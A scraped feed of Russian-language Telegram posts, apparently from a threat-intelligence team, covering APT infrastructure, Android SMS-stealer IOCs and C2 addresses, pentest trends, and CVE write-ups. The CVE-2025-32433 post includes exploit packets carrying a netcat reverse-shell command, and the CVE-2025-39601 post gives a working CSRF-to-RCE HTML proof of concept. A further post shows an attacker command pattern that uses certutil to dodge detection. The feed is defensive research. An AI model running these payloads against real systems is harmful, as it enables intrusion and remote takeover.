Интересный C2 .NET KingOfHearts 👀
В инциденте с новой версией бэкдора KingOfHearts группировки Obstinate Mogwai фигурировал C2-сервер
В конце 2023 года эксперты одной зарубежной компании предположили, что этот C2 связан с Иранской APT-группировкой MuddyWater. Адрес был помечен как «Suspected MuddyC2Go (2023)», но авторы указали, что не обнаружили у подозрительного C2 вредоносной активности или известных шаблонов URL фреймворка
Статью выпустили 8 ноября 2023 года, а в нашем инциденте бэкдор
Принадлежал ли сервер
P.S. Знаем, что сейчас 2025 год, но наш ресерчер очень хотел поделиться этой информацией с комьюнити :)
В инциденте с новой версией бэкдора KingOfHearts группировки Obstinate Mogwai фигурировал C2-сервер
45.150.64.23.В конце 2023 года эксперты одной зарубежной компании предположили, что этот C2 связан с Иранской APT-группировкой MuddyWater. Адрес был помечен как «Suspected MuddyC2Go (2023)», но авторы указали, что не обнаружили у подозрительного C2 вредоносной активности или известных шаблонов URL фреймворка
MuddyC2Go. Статью выпустили 8 ноября 2023 года, а в нашем инциденте бэкдор
.NET KingOfHearts с аналогичным C2 использовался 14 ноября 2023. Принадлежал ли сервер
45.150.64.23 сначала MuddyWater, а потом перешел к Obstinate Mogwai — неизвестно. Возможно, эксперты ошибочно отнесли этот C2 к MuddyWater, хотя изначально он никак не был связан с этой группировкой.Please open Telegram to view this post
VIEW IN TELEGRAM
🫡11🔥10👾6🤔2🤨2👍1
Очередная кампания по рассылке Android-вредоносов в Telegram ✈️
Рассылка началась ориентировочно в конце марта и продолжается до сих пор. Вредонос сопровождается сообщениями, которые склоняют жертву к немедленному запуску мимикрирующего под фото или видео APK-файла (Скриншот 1).
По функционалу распространяемый вредонос похож на
Мы считаем, что обнаружили одну из новых вариаций этого ВПО. Она тоже работает с SMS:
— эксфильтрует последние 14480 SMS-сообщений;
— эксфильтрует информацию о зараженном устройстве, установленных приложениях банков, мессенджеров, маркетплейсов и «Госуслуг», а также содержимое буфера обмена;
— регистрирует себя как приложение для приема SMS по умолчанию и перенаправляет на сервер управления SMS-сообщениями от Telegram.
Особенности вредоноса
💣 После запуска ВПО сначала получает конфигурацию воркера со специального сервера конфигураций. В конфигурации указаны: команда, имя и telegram handle воркера, номер телефона как резервный канал получения уведомлений о заражениях.
💣 Из собранных конфигураций мы обнаружили 10 серверов управления для эксфильтрации SMS.
💣 Во всех конфигурациях используются одинаковые параметры AES-шифрования. В начале кампании использовался один и тот же номер телефона для перенаправления SMS, но в последних образцах стали появляться новые.
💣 После заражения злоумышленники получают возможность отправлять SMS от имени жертвы на заданный номер по команде. Команда приходит в специально сформированном входящем SMS (Скриншот 2).
💣 Злоумышленники работают оперативно — после заражения очередной жертвы уже через 13 минут злоумышленники рассылали ВПО всем контактам в Telegram.
Мы предполагаем, что на телефоне злоумышленников из конфигурации установлено аналогичное ВПО, которое обрабатывает такие SMS и POST-запросом отправляет данные жертвы и воркера на сервер управления команды.
Такая схема может позволить получать данные о зараженной жертве, даже если на телефоне жертвы не будет интернета, а серверы управления ВПО заблокируют (Скриншот 3).
Как защититься
Если вы стали жертвой, нужно найти приложение и удалить его из списка установленных. Обычно имя вредоносного приложения совпадает с именем присланного apk-файла (Скриншот 4).
IOC
md5:
Имена apk-файлов:
Сервер конфигураций воркеров:
C2-серверы команд:
Рассылка началась ориентировочно в конце марта и продолжается до сих пор. Вредонос сопровождается сообщениями, которые склоняют жертву к немедленному запуску мимикрирующего под фото или видео APK-файла (Скриншот 1).
По функционалу распространяемый вредонос похож на
PhotoAndroidMalware, о котором недавно сообщили коллеги из F6. Мы считаем, что обнаружили одну из новых вариаций этого ВПО. Она тоже работает с SMS:
— эксфильтрует последние 14480 SMS-сообщений;
— эксфильтрует информацию о зараженном устройстве, установленных приложениях банков, мессенджеров, маркетплейсов и «Госуслуг», а также содержимое буфера обмена;
— регистрирует себя как приложение для приема SMS по умолчанию и перенаправляет на сервер управления SMS-сообщениями от Telegram.
Особенности вредоноса
Мы предполагаем, что на телефоне злоумышленников из конфигурации установлено аналогичное ВПО, которое обрабатывает такие SMS и POST-запросом отправляет данные жертвы и воркера на сервер управления команды.
Такая схема может позволить получать данные о зараженной жертве, даже если на телефоне жертвы не будет интернета, а серверы управления ВПО заблокируют (Скриншот 3).
Как защититься
Если вы стали жертвой, нужно найти приложение и удалить его из списка установленных. Обычно имя вредоносного приложения совпадает с именем присланного apk-файла (Скриншот 4).
IOC
md5:
31210d375856bee724080f69b4c5e81a
8955c7ee6b1b6adc50838a0b7e6c7b6f
8a602991a6fdc161cdb6763871346f99
33f2215163e708a2453e166c4f110c47
7f5f91b0e1a2320655d103cbdda5ebdf
c80574ce2840120608f2026507710062
9931eb52878c5957251014b750bb781c
32c22d0fe9b8afb65e405165694a6bd5
2d05bc8a1a38517e2abd3183e3c6923e
09f829e6b4e32751dbc9a776cce0f902
Имена apk-файлов:
Архив фото (88).apk
Mega видео (Архив).apk
Фoт0(4)9_0.4_2025.apk
Яндekc Buдeo.apk
Документы (3).apk
Video.1)1.226293.apk
YandexDisc.apk
Фото (53 шт.).apk
Сервер конфигураций воркеров:
http://185.100.157.190:8000
C2-серверы команд:
http://89.23.101.185:120
http://89.23.102.98:120
http://89.23.102.238:120
http://91.92.46.212:120
http://91.92.46.228:120
http://185.177.239.24:100
http://185.177.239.24:120
http://185.100.157.82:120
http://185.100.157.227:100
http://185.100.157.237:120
http://193.68.89.199:120
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍12👾4❤2🤡1
Советы пентестерам на 2025 год 🚩
Наша OffSec-команда выпустила отчет о ключевых уязвимостях инфраструктур российских компаний в 2024 году. Повторяться не будем — сконцентрируемся на трендах в пентесте, которые могут быть актуальны в 2025.
😬 Проверяйте CMS
Все еще обнаруживаются уязвимости в функциональности
😬 Импортозамещение может быть уязвимым
Наши эксперты все чаще исследуют безопасность российских аналогов зарубежных сервисов. Разработчики не всегда успевают провести оценку безопасности приложения или системы, поэтому обнаруживается много изъянов и в базах данных, и в логике процессов приложений.
😬 Классические проблемы с паролями
Пароли по умолчанию, слабые парольные политики и переиспользование паролей остаются проблемой в российских организациях. Обстоятельная разведка аутентификационных данных в открытых источниках перед пентестом — приличная часть работы, которую OffSec-эксперты регулярно делали в прошлом году.
Разведка позволяет собрать учетные записи и пароли еще до старта пентеста и потом использовать эти данные, применяя технику password spraying на инфраструктуре, которую надо проверить. Для поиска секретов наши эксперты рекомендуют использовать Trufflehog.
😬 Готовимся к атакам на Active Directory и FreeIPA
Во внутренней части инфраструктур в топе атак на AD стоит ESC. В 2024 году наши пентестеры начали замечать, что многие организации переходят на FreeIPA-решения. Они, как и импортозамещающие продукты, содержат немало изъянов. Эксперты советуют обратить на FreeIPA внимание и начать готовиться к атакам на нее.
Наша OffSec-команда выпустила отчет о ключевых уязвимостях инфраструктур российских компаний в 2024 году. Повторяться не будем — сконцентрируемся на трендах в пентесте, которые могут быть актуальны в 2025.
Все еще обнаруживаются уязвимости в функциональности
vote популярной CMS-системы 1С Bitrix и ее производных. Эксперты советуют перечитать работу исследователя cr1f о безопасности Bitrix и не вычеркивать ее из своих сплойтов. А еще — не забывать фаззить Bitrix специализированными словарями.Наши эксперты все чаще исследуют безопасность российских аналогов зарубежных сервисов. Разработчики не всегда успевают провести оценку безопасности приложения или системы, поэтому обнаруживается много изъянов и в базах данных, и в логике процессов приложений.
Пароли по умолчанию, слабые парольные политики и переиспользование паролей остаются проблемой в российских организациях. Обстоятельная разведка аутентификационных данных в открытых источниках перед пентестом — приличная часть работы, которую OffSec-эксперты регулярно делали в прошлом году.
Разведка позволяет собрать учетные записи и пароли еще до старта пентеста и потом использовать эти данные, применяя технику password spraying на инфраструктуре, которую надо проверить. Для поиска секретов наши эксперты рекомендуют использовать Trufflehog.
Во внутренней части инфраструктур в топе атак на AD стоит ESC. В 2024 году наши пентестеры начали замечать, что многие организации переходят на FreeIPA-решения. Они, как и импортозамещающие продукты, содержат немало изъянов. Эксперты советуют обратить на FreeIPA внимание и начать готовиться к атакам на нее.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🤔5👏2👾2
Десятибалльная уязвимость CVE-2025-32433 👾
CVE-2025-32433 — Remote Code Execution-уязвимость в SSH-серверах на базе Erlang/OTP, которая позволяет получить несанкционированный доступ к уязвимым системам и выполнять произвольные команды без аутентификации.
Метрики
Уязвимы версии
Как происходит атака
По стандарту канал для выполнения команд SSH-клиентом открывается после прохождения аутентификации, в противном случае сообщение будет отвергнуто или приведет к разрыву соединения.
Но уязвимые версии
Из чего состоит эксплоит
Эксплоит может состоять из четырёх клиентских SSH-пакетов после установления TCP-соединения.
1️⃣ Обмен баннерами. Клиент отправляет строку, сервер отвечает своей:
2️⃣ Инициализация обмена ключами:
3️⃣ Отправка SSH-пакета типа
4️⃣ Запрос на выполнение команды:
Пример выполнения CVE-2025-32433
Для примера отправим пакет, содержащий команду создания и выполнения Reverse Shell-кода, для получения контроля над уязвимым сервером:
Как детектировать и защититься
Важно следить, что сообщения типов
Для написания IDS-сигнатур можно обратить внимание на структуру таких сообщений:
Содержимое полей
❗️ Настоятельно советуем обновиться до последних версий, а до этого ограничить доступ к SSH.
CVE-2025-32433 — Remote Code Execution-уязвимость в SSH-серверах на базе Erlang/OTP, которая позволяет получить несанкционированный доступ к уязвимым системам и выполнять произвольные команды без аутентификации.
Метрики
Base Score: 10.0 CRITICAL
CWE-306
Уязвимы версии
<= OTP-27.3.2
<= OTP-26.2.5.10
<= OTP-25.3.2.19
Как происходит атака
По стандарту канал для выполнения команд SSH-клиентом открывается после прохождения аутентификации, в противном случае сообщение будет отвергнуто или приведет к разрыву соединения.
Но уязвимые версии
Erlang/OTP могут не проверять стадию аутентификации и обрабатывать CHANNEL_OPEN и exec сразу. Это приводит к тому, что для выполнения команд на сервере злоумышленникам достаточно иметь сетевой доступ к нему.Из чего состоит эксплоит
Эксплоит может состоять из четырёх клиентских SSH-пакетов после установления TCP-соединения.
s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
banner = s.recv(1024)
kex_packet = build_kexinit()
s.sendall(pad_packet(kex_packet))
SSH_MSG_CHANNEL_OPEN с «просьбой» открыть канал, как будто клиент уже прошел аутентификацию:chan_open = build_channel_open()
s.sendall(pad_packet(chan_open))
chan_req = build_channel_request(
command='file:write_file("/lab.sh", <<"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.0.22 8080 >/tmp/f">>), os:cmd("chmod +x /lab.sh"), os:cmd("/lab.sh").'
)
s.sendall(pad_packet(chan_req))
Пример выполнения CVE-2025-32433
Для примера отправим пакет, содержащий команду создания и выполнения Reverse Shell-кода, для получения контроля над уязвимым сервером:
file:write_file("/lab.sh", <<COMAND>>), os:cmd("chmod +x /lab.sh"), os:cmd("/lab.sh").
file:write_file("/lab.sh,<<COMAND>>)os:cmd("chmod +x /lab.sh") — предоставит права на выполнение;os:cmd("/lab.sh") — запустит Reverse Shell.Как детектировать и защититься
Важно следить, что сообщения типов
MSG_CHANNEL_OPEN и MSG_CHANNEL_REQUEST не передаются в открытом виде в сетевом трафике. Согласно RFC 4253 и 4254, обмен такими сообщениями осуществляется после обмена ключами и аутентификации в зашифрованном виде. Для написания IDS-сигнатур можно обратить внимание на структуру таких сообщений:
byte SSH_MSG_CHANNEL_OPEN # значение 0x5a
string "session"
uint32 sender channel
uint32 initial window size
uint32 maximum packet size
byte SSH_MSG_CHANNEL_REQUEST # значение 0x62
uint32 recipient channel
string "exec"
boolean want reply
string command
Содержимое полей
string может меняться в зависимости от типа, а приведенные выше session и exec соответствуют запросам на открытие канала и выполнение команды. Появление в сетевом трафике SSH в открытом виде таких сообщений может свидетельствовать о попытках эксплуатации уязвимости.Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🫡7⚡3❤2🌚1
Критическая уязвимость CVE-2025–39601 👾
CSRF-атаки все еще актуальны, особенно если мы говорим про плагины к популярным CMS. Сегодня расскажем, к чему они могут привести, на примере CVE-2025–39601.
CVE-2025–39601 — уязвимость подделки межсайтовых запросов (CSRF) в плагине WPFactory Custom CSS, JS и PHP для WordPress.
❗️ Уязвимы все версии до 2.4.1, рекомендуем обновиться.
Метрики
Как это работает
После установки плагина
В передаваемых данных при создании скрипта отсутствует CSRF-токен, нет и отдельного HTTP-заголовка или значения COOKIE, содержащего токен. Этот запрос можно будет подделать и создать скрипт от лица администратора, что приведет к RCE.
Пример
Классический сценарий атаки будет выглядеть так:
Вредоносное приложение имеет такую HTML-структуру:
Код передается в блоке
Этот POST-запрос будет полностью эмулировать легитимный запрос администратора, и только заголовок
Как защищаться
1️⃣ Не отсылать или ограничить отсылку COOKIE файлов сторонним сайтам или приложениям;
2️⃣ использовать CORS;
3️⃣ использовать CSRF-токен;
4️⃣ дополнительно проверять на валидность заголовки
CSRF-атаки все еще актуальны, особенно если мы говорим про плагины к популярным CMS. Сегодня расскажем, к чему они могут привести, на примере CVE-2025–39601.
CVE-2025–39601 — уязвимость подделки межсайтовых запросов (CSRF) в плагине WPFactory Custom CSS, JS и PHP для WordPress.
Метрики
Base Score: 9,6
CWE: CWE-352
Как это работает
После установки плагина
WPFactory Custom CSS, JS и PHP у администратора появляется возможность создавать собственные PHP скрипты на конечной точке /wp-admin/tools.php?page=alg-custom-php. Сам PHP код и другие параметры передаются в теле POST-запроса: alg_custom_css_php_enabled=1&alg_custom_css_php_execute=plugins_loaded&alg_custom_css_php=<?php system(id); ?>&alg_ccjp_submit=php
В передаваемых данных при создании скрипта отсутствует CSRF-токен, нет и отдельного HTTP-заголовка или значения COOKIE, содержащего токен. Этот запрос можно будет подделать и создать скрипт от лица администратора, что приведет к RCE.
Пример
Классический сценарий атаки будет выглядеть так:
Администратор получает вредоносную ссылку на приложение -> администратор переходит по ссылке -> от лица администратора создаётся скрипт с вредоносным кодом, который приводит к RCE.
Вредоносное приложение имеет такую HTML-структуру:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<noscript>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability </noscript>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1 </h1>
<form action="http://XXX/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php" value="<?php system('id'); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<nonoscript>
<input type="submit" value="Submit">
</nonoscript>
</form>
</body>
</html>
Код передается в блоке
alg_custom_css_php. В данном случае, для примера, мы выведем результат команды id, который сможет увидеть любой пользователь приложения (Скриншот 1).Этот POST-запрос будет полностью эмулировать легитимный запрос администратора, и только заголовок
Origin будет содержать информацию о другом приложении (Скриншот 2).Как защищаться
Origin, Referer.Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👨💻6👍5👾2❤1🤔1
Веб-панель Bulldog Backdoor — главный инструмент Shedding Zmiy 🐍
Исследуя инфраструктуру группировки Shedding Zmiy, мы обнаружили в открытом доступе веб-панель Bulldog Backdoor. Фронтенд написан с помощью фреймворка
Проанализировав панель, наша команда поняла подходы Shedding Zmiy к построению части своей C2-инфраструктуры. Это пролило свет на экосистему имплантов и их связи, а также на механизмы работы Bulldog Backdoor.
Веб-панель Bulldog Backdoor помогает Shedding Zmiy
💣 Генерировать новые импланты для Bulldog Backdoor и beacon’ы других типов.
💣 Управлять активными сессиями в сети жертвы.
💣 Передавать команды отложенного исполнения — вероятно, для имитации активности в разных часовых поясах.
💣 Собирать подробную статистику по сессиям: активным, завершённым, потерянным.
💣 Просматривать интерактивную карту зараженной инфраструктуры в режиме реального времени (Скриншот 2 — так она могла бы выглядеть).
💣 Работать с данными на разных уровнях абстракции за счет многоуровневой системы сущностей — «Цель», «Хост» и др.
💣 Осуществлять автоматизированный брутфорс на основе собранных учетных данных.
💣 Легко передавать критически важную информацию между операторами с помощью системы заметок для целей и хостов с поддержкой Markdown (Скриншот 3 — пример заметки).
🔗 Полный технический разбор веб-панели Bulldog Backdoor версии
Исследуя инфраструктуру группировки Shedding Zmiy, мы обнаружили в открытом доступе веб-панель Bulldog Backdoor. Фронтенд написан с помощью фреймворка
React.js с использованием TypeScript. Мы смогли выгрузить исходный код компонентов в первозданном виде (Скриншот 1 — структура проекта).Проанализировав панель, наша команда поняла подходы Shedding Zmiy к построению части своей C2-инфраструктуры. Это пролило свет на экосистему имплантов и их связи, а также на механизмы работы Bulldog Backdoor.
Веб-панель Bulldog Backdoor — ключевой элемент экосистемы группировки:
— Агрегирует данные, полученные в ходе атак.
— Служит интерфейсом управления активными операциями.
— Помогает централизованно контролировать всю сеть зараженных систем.
Веб-панель Bulldog Backdoor помогает Shedding Zmiy
v0.1.15 читайте в нашей новой статье.Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍12❤4👾2
Уязвимость виртуальной машины «Битрикс» в арсенале Shedding Zmiy ⚡️
Недавно ФСТЭК России распространила уведомление об уязвимости BDU:2025-04539 в сервере «1С-Битрикс: Виртуальная машина». Из-за недостатков в разграничении прав доступа атакующие могли поднимать свои права на скомпрометированном сервере до
Наша команда обнаружила эту уязвимость, когда анализировала утилитудля размещения на атакованном сервере бэкдора с функциональностью получения root-привилегий.
Уязвимость заключается в неправильной конфигурации доступов для пользователя bitrix.
😬 Пользователь имел доступ к настройкам веб-серверов
😬 Собрав вредоносный модуль и изменив настройки веб-сервера, злоумышленники могли повысить свои привилегии до уровня
😬 Мы нашли дополнительные ошибки в конфигурации доступа файлов служб Linux, используемых в виртуальной машине. Они позволяли внедрить произвольный код в скрипт службы и исполнить его от пользователя
Обнаружив уязвимость, мы сразу же сообщили о ней вендору. Патч, закрывающий уязвимость, уже доступен на сайте. Если ещё не обновились — сейчас самое время!
Недавно ФСТЭК России распространила уведомление об уязвимости BDU:2025-04539 в сервере «1С-Битрикс: Виртуальная машина». Из-за недостатков в разграничении прав доступа атакующие могли поднимать свои права на скомпрометированном сервере до
root.Наша команда обнаружила эту уязвимость, когда анализировала утилиту
Install — один из вредоносных инструментов группировки Shedding Zmiy. Его атакующие могли использовать Уязвимость заключается в неправильной конфигурации доступов для пользователя bitrix.
Apache и Nginx. root.root.Обнаружив уязвимость, мы сразу же сообщили о ней вендору. Патч, закрывающий уязвимость, уже доступен на сайте. Если ещё не обновились — сейчас самое время!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍4❤3🤔1👾1
Как Erudite Mogwai обходит правила детектирования 👣
Уже в нескольких кейсах мы видим, как группировка Erudite Mogwai (или Space Pirates) при боковом перемещении использует один и тот же паттерн выполнения команд:
Если атакующие выполняют команды с использованием задач (
Зачем Erudite Mogwai используют такой паттерн
💣 Некоторые средства АВПО неправильно обрабатывают этот командлайн, в журналах оказывается лишь
💣 Если правила детектирования подозрительных запусков командной оболочки используют полный путь к
💣 После выполнения
Вывод команды whoami — SANDBOX\User.
Но есть и хорошие новости
👀 Логирование процессов Event ID 4688 в журнале Windows Security обрабатывает командлайн корректно.
👀 Паттерн команды приметный, и аналитик наверняка засомневается в его легитимности.
👀 Иногда атакующие забывают удалить файл с выводом
👀 Можно быстро обнаружить значительную часть активности атакующих, грепнув по диску
Используйте эту информацию при написании детектов.
Удачной охоты!👀
Уже в нескольких кейсах мы видим, как группировка Erudite Mogwai (или Space Pirates) при боковом перемещении использует один и тот же паттерн выполнения команд:
C:\Windows\System32\calc.exe..\..\cmd.exe /C <COMMAND> > C:\Users\Public\<OUTPUT_NAME> 2>&1 & certutil -f -encode C:\Users\Public\<OUTPUT_NAME> C:\Users\Public\<OUTPUT_NAME> 2>&1
<COMMAND><OUTPUT_NAME> — имя файла, где будет сохранен вывод команды, закодированный в Base64 с помощью certutil. Обычно оно соответствует регулярному выражению [A-z]{8}.log.Если атакующие выполняют команды с использованием задач (
AtExec), то имя задачи обычно соответствует имени файла <OUTPUT_NAME>, но без расширения.Зачем Erudite Mogwai используют такой паттерн
certutil -f -encode C:\Users\Public\<OUTPUT_NAME> C:\Users\Public\<OUTPUT_NAME> 2>&1. Это затрудняет исследование активности.cmd, например C:\Windows\System32\cmd.exe /C — то они не сработают. Аналогично с правилами детектирования АВПО.certutil файл с выводом команды будет менее понятным для неподготовленного администратора:-----BEGIN CERTIFICATE-----
U0FOREJPWFxVc2Vy
-----END CERTIFICATE-----
Но есть и хорошие новости
C:\Users\Public\<OUTPUT_NAME>. Так можно найти системы, где уже побывал Erudite Mogwai.calc.exe..\..\cmd.exe, в том числе в неразмеченном пространстве.Используйте эту информацию при написании детектов.
Удачной охоты!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👾6❤4👀3💩1
Инструменты Shedding Zmiy в веб-панели Bulldog Backdoor
Генерация новых имплантов в веб-панели не ограничена одним Bulldog Backdoor. Она объединяет в себе многие инструменты группировки Shedding Zmiy.
В исходном коде мы обнаружили упоминание девяти типов beacon'ов (Скриншот 1):
— gecko;
— revshell;
— proxy;
— teardrop;
— gwyntyk;
— gsnetcat;
— puma;
— mycelium;
— mushroom.
Некоторые из них — ранее не документированные. Но есть и узнаваемые: например, имплант puma, о котором у нас есть отдельная статья.
Интересные факты о веб-панели Bulldog Backdoor🔎
1️⃣ Встроенная поддержка модулей Bulldog Backdoor
В панели есть категория имплантов bb, включающая bb-shell, bb-custom, и отдельная категория collector (Скриншот 2).
Судя по коду, bb — это бинарь-обертка, объединяющий несколько модулей: collector, revshell, proxy, gecko (Скриншот 3). Вариант bb-custom позволяет оператору выбрать, какие именно компоненты должны быть включены в финальный исполняемый файл — через специальное поле
2️⃣ Среди имплантов есть gsnetcat
Еще он встречается на странице Remote sessions. Эта страница в веб-панели до сих пор имеет путь
Это наследие старых версий. Вероятно, раньше эта вкладка была связанна только с gsnetcat, но ее забыли или не захотели переименовывать.
3️⃣ Вкладка Patched bins на странице Target host (Скриншот 4)
Мы полагаем, что она отображает подменные легитимные исполняемые файлы — излюбленная техника группировки Shedding Zmiy.
👍 Подробнее о веб-панели Bulldog Backdoor — в нашем исследовании.
Генерация новых имплантов в веб-панели не ограничена одним Bulldog Backdoor. Она объединяет в себе многие инструменты группировки Shedding Zmiy.
В исходном коде мы обнаружили упоминание девяти типов beacon'ов (Скриншот 1):
— gecko;
— revshell;
— proxy;
— teardrop;
— gwyntyk;
— gsnetcat;
— puma;
— mycelium;
— mushroom.
Некоторые из них — ранее не документированные. Но есть и узнаваемые: например, имплант puma, о котором у нас есть отдельная статья.
Интересные факты о веб-панели Bulldog Backdoor
В панели есть категория имплантов bb, включающая bb-shell, bb-custom, и отдельная категория collector (Скриншот 2).
Судя по коду, bb — это бинарь-обертка, объединяющий несколько модулей: collector, revshell, proxy, gecko (Скриншот 3). Вариант bb-custom позволяет оператору выбрать, какие именно компоненты должны быть включены в финальный исполняемый файл — через специальное поле
Parts в интерфейсе генерации.Еще он встречается на странице Remote sessions. Эта страница в веб-панели до сих пор имеет путь
/ui/gs-netcat, а соответствующий ей React-компонент называется NetcatTablePage.Это наследие старых версий. Вероятно, раньше эта вкладка была связанна только с gsnetcat, но ее забыли или не захотели переименовывать.
Мы полагаем, что она отображает подменные легитимные исполняемые файлы — излюбленная техника группировки Shedding Zmiy.
Веб-панель Bulldog Backdoor — не просто интерфейс управления одним бэкдором, а многофункциональный командный центр, объединяющий весь вредоносный инструментарий Shedding Zmiy. Ее функциональность и архитектура делают ее ядром всех операций группировки, обеспечивая масштабируемость, автоматизацию и гибкость в проведении атак.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍9🔥9👾1
Бэкдор VipNet: все новое — хорошо забытое старое
В апреле наша команда проводила оценку компрометации инфраструктуры одного органа исполнительной власти. В каталоге с резервной копией ViPNet мы обнаружили вредоносный файл
😬 Мы проанализировали файл и выяснили, что это загрузчик ранее не встречавшегося нам бэкдора. Он был частью архива, мимикрировавшего под обновление ПО ViPNet.
😬 А недавно коллеги из «Лаборатории Касперского» выпустили отчет о бэкдоре, который тоже мимикрировал под обновления ViPNet: он использовал такие же схему запуска и загрузчик.
😬 Все это вернуло нас в 2021 год, когда при расследовании одного инцидента мы столкнулись с аналогичной картиной. Недостаток безопасности в системе обновления ViPNet для доставки и запуска вредоносной полезной нагрузки любят использовать восточно-азиатские APT-группировки.
Мы сравнили цепочку запуска вредоносной нагрузки из апрельского кейса и с цепочкой из 2021 года: они оказались почти идентичными.
👀 Подробности о бэкдоре VipNet и как от него защититься — в новой статье.
В апреле наша команда проводила оценку компрометации инфраструктуры одного органа исполнительной власти. В каталоге с резервной копией ViPNet мы обнаружили вредоносный файл
msinfo32.exe, размещенный на хосте летом 2022 года.Мы сравнили цепочку запуска вредоносной нагрузки из апрельского кейса и с цепочкой из 2021 года: они оказались почти идентичными.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍11❤🔥5🤔2👀2
Статический анализ контейнеров 1C 👀
Недавно коллеги из PT рассказывали про 1С Shell, который позволяет выполнять произвольные команды на Windows и на Linux, читать файлы и много чего еще.
Сегодня хотим поделиться с вами обзором утилиты для статического анализа на примере одного шелла. Она поможет определить функциональность шелла и узнать полезные подробности для команды реагирования — например, что выполненные через этот шелл команды записываются в файл
Основные особенности контейнеров 1С
— Имеют заголовок
— Представляют из себя нечто вроде виртуальной файловой системы: контейнер хранит в себе различные документы, которые состоят из блоков;
— Большинство данных упакованы алгоритмом Deflate, из-за чего в файле почти нет полезных читаемых строк, кроме нескольких UUID строчек.
Для анализа такого файла можно загрузить его в 1С, но если под рукой нет этого ПО, можно воспользоваться утилитами — сегодня разберем pfCFTools.
Как работает утилита pfCFTools для анализа контейнеров
pfCFTools — это утилита для работы с файлами CF/CFE/CFU/EPF/ERF и подобными.
Для сборки нужно загрузить IDE Free pascal и запустить команду:
Использование:
В каталоге
Вспомогательные файлы для работы с метаданными:
—
—
—
—
Остальные файлы:
—
—
—
Для чего нужен каждый файл, например, описано здесь. В файле
Выжимка из кода:
У утилиты pfCFTools есть один минус:нужно копаться в непонятных файлах и искать код шелла.
Ставьте ⚡️, если нужен разбор еще двух утилит для анализа 1C шелла.
Недавно коллеги из PT рассказывали про 1С Shell, который позволяет выполнять произвольные команды на Windows и на Linux, читать файлы и много чего еще.
Сегодня хотим поделиться с вами обзором утилиты для статического анализа на примере одного шелла. Она поможет определить функциональность шелла и узнать полезные подробности для команды реагирования — например, что выполненные через этот шелл команды записываются в файл
%TEMP%\res.txt.1C shell — это контейнер 1С (расширения файлов CF, EPF, ERF, CFE). Формат уже давно разобран, например, здесь и здесь.
Основные особенности контейнеров 1С
— Имеют заголовок
FF FF FF 7F;— Представляют из себя нечто вроде виртуальной файловой системы: контейнер хранит в себе различные документы, которые состоят из блоков;
— Большинство данных упакованы алгоритмом Deflate, из-за чего в файле почти нет полезных читаемых строк, кроме нескольких UUID строчек.
Для анализа такого файла можно загрузить его в 1С, но если под рукой нет этого ПО, можно воспользоваться утилитами — сегодня разберем pfCFTools.
Как работает утилита pfCFTools для анализа контейнеров
pfCFTools — это утилита для работы с файлами CF/CFE/CFU/EPF/ERF и подобными.
Для сборки нужно загрузить IDE Free pascal и запустить команду:
fpc.exe pfCFTool.lpr
Использование:
pfCFTool.exe -u Обработка.epf -c auto -d res_dir -r
-u – unpack;
-c – compression;
-d – directory to unpack;
-r – recurse processing.
В каталоге
res_dir появляются распакованные файлы и каталоги.Вспомогательные файлы для работы с метаданными:
—
version.deflate – информация о версии контейнера;—
versions.deflate — пары id метаданного (связанная совокупность файлов) и id-версии метаданного;—
root.deflate — id файла с описанием структуры метаданных для контейнеров CF, EPF, ERF (форматы файлов 1С);—
copyinfo.deflate — информация об изменениях в формате внутренних данных 1С.Остальные файлы:
—
uuid.deflate (ce244e8a-6d30-4e49-a244-c6d80d2ea085.deflate);—
uuid.type.deflate (ce244e8a-6d30-4e49-a244-c6d80d2ea085.0.deflate), где 0 — это постфикс модуля объекта, где как раз располагается 1С-код шелла — самый полезный файл;—
каталоги c uuid.Для чего нужен каждый файл, например, описано здесь. В файле
ce244e8a-6d30-4e49-a244-c6d80d2ea085.0.deflate на 3283 строке начинается код модуля, который реализует функционал шелла. Выжимка из кода:
Процедура ПриСозданииНаСервере(Отказ, СтандартнаяОбработка)
УстановитьПривилегированныйРежим(Истина);
СисИнфо = Новый СистемнаяИнформация;
Платформа = СисИнфо.ТипПлатформы;
ВерсияОС = СисИнфо.ВерсияОС;
ИмяКомпьютера = ИмяКомпьютера();
ПапкаВременныхФайлов = КаталогВременныхФайлов();
Объект.ИмяФайлаВывода = КаталогВременныхФайлов() + ""res.txt"";
Объект.Способ = ""WScript.Shell"";
Платформа2 = ""Windows"";
Объект.Кодировка1 = ""cp866"";
Объект.Кодировка2 = ""cp866"";
…
КонецПроцедуры
У утилиты pfCFTools есть один минус:
Ставьте ⚡️, если нужен разбор еще двух утилит для анализа 1C шелла.
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡25🔥9👍6👾2👀1
ML под угрозой: критическая уязвимость CVE-2025-32375 👾
CVE-2025-32375 — уязвимость небезопасной десериализации в BentoML, позволяющая выполнить произвольный код на сервере.
❗️ Уязвимы все версии до 1.4.8 — рекомендуем обновиться.
BentoML — это фреймворк для упаковки, деплоя и сервинга моделей машинного обучения.
Метрики📈
Детали уязвимости🔎
Атака происходит с использованием
Полезная нагрузка
Полезная нагрузка — это сериализованный объект:
При десериализации она отправит вывод команды
Пример эксплуатации
👀 Злоумышленники запускают прослушивание порта на удаленном сервере, например, через netcat.
👀 С атакующего хоста запускается эксплойт.
